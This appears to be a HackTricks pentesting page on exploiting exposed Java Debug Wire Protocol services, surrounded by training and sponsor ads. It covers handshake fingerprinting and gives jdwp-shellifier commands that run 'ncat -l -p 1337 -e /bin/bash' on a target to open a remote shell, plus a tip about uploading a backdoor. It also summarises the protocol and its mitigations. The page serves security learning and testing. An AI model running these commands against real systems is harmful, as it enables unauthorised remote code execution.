mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-25 06:00:40 +00:00
106 lines
7.6 KiB
Markdown
106 lines
7.6 KiB
Markdown
# Pentesting JDWP - Java Debug Wire Protocol
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|
|
|
|
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Get a hacker's perspective on your web apps, network, and cloud**
|
|
|
|
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
|
|
|
|
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
|
|
|
|
## Exploiting
|
|
|
|
JDWP exploitation hinges on the **protocol's lack of authentication and encryption**. It's generally found on **port 8000**, but other ports are possible. The initial connection is made by sending a "JDWP-Handshake" to the target port. If a JDWP service is active, it responds with the same string, confirming its presence. This handshake acts as a fingerprinting method to identify JDWP services on the network.
|
|
|
|
In terms of process identification, searching for the string "jdwk" in Java processes can indicate an active JDWP session.
|
|
|
|
The go-to tool is [jdwp-shellifier](https://github.com/hugsy/jdwp-shellifier). You can use it with different parameters:
|
|
|
|
```bash
|
|
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 #Obtain internal data
|
|
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --cmd 'ncat -l -p 1337 -e /bin/bash' #Exec something
|
|
./jdwp-shellifier.py -t 192.168.2.9 -p 8000 --break-on 'java.lang.String.indexOf' --cmd 'ncat -l -p 1337 -e /bin/bash' #Uses java.lang.String.indexOf as breakpoint instead of java.net.ServerSocket.accept
|
|
```
|
|
|
|
I found that the use of `--break-on 'java.lang.String.indexOf'` make the exploit more **stable**. And if you have the change to upload a backdoor to the host and execute it instead of executing a command, the exploit will be even more stable.
|
|
|
|
## More details
|
|
|
|
**This is a summary of [https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)**. Check it for further details.
|
|
|
|
|
|
1. **JDWP Overview**:
|
|
- It's a packet-based network binary protocol, primarily synchronous.
|
|
- Lacks authentication and encryption, making it vulnerable when exposed to hostile networks.
|
|
|
|
2. **JDWP Handshake**:
|
|
- A simple handshake process is used to initiate communication. A 14-character ASCII string “JDWP-Handshake” is exchanged between the Debugger (client) and the Debuggee (server).
|
|
|
|
3. **JDWP Communication**:
|
|
- Messages have a simple structure with fields like Length, Id, Flag, and CommandSet.
|
|
- CommandSet values range from 0x40 to 0x80, representing different actions and events.
|
|
|
|
4. **Exploitation**:
|
|
- JDWP allows loading and invoking arbitrary classes and bytecode, posing security risks.
|
|
- The article details an exploitation process in five steps, involving fetching Java Runtime references, setting breakpoints, and invoking methods.
|
|
|
|
5. **Real-Life Exploitation**:
|
|
- Despite potential firewall protections, JDWP services are discoverable and exploitable in real-world scenarios, as demonstrated by searches on platforms like ShodanHQ and GitHub.
|
|
- The exploit script was tested against various JDK versions and is platform-independent, offering reliable Remote Code Execution (RCE).
|
|
|
|
6. **Security Implications**:
|
|
- The presence of open JDWP services on the internet underscores the need for regular security reviews, disabling debug functionalities in production, and proper firewall configurations.
|
|
|
|
|
|
### **References:**
|
|
|
|
* [[https://ioactive.com/hacking-java-debug-wire-protocol-or-how/](https://ioactive.com/hacking-java-debug-wire-protocol-or-how/)]
|
|
* [https://github.com/IOActive/jdwp-shellifier](https://github.com/IOActive/jdwp-shellifier)
|
|
* [http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html](http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html)
|
|
* http://www.secdev.org/projects/scapy(no longer active)
|
|
* [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE)
|
|
* http://www.hsc-news.com/archives/2013/000109.html (no longer active)
|
|
* [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt)
|
|
* https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults
|
|
* [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html)
|
|
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com)
|
|
* [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
|
|
* [http://nmap.org/nsedoc/scripts/jdwp-exec.html](http://nmap.org/nsedoc/scripts/jdwp-exec.html)
|
|
|
|
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
|
|
|
|
**Get a hacker's perspective on your web apps, network, and cloud**
|
|
|
|
**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
|
|
|
|
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
|
|
|
|
{% hint style="success" %}
|
|
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
|
|
<details>
|
|
|
|
<summary>Support HackTricks</summary>
|
|
|
|
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
|
|
</details>
|
|
{% endhint %}
|